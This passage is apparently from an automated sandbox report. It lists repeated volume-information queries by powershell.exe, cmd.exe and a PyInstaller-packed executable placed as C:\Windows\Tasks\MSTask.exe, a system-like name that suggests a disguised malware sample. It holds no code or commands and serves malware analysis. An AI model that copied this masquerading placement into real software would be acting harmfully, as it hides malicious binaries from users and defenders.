                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\certifi VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_ctypes.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_hashlib.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_lzma.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_socket.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\select.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_bz2.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_lzma.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\psutil VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\psutil VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\psutil VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_ssl.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
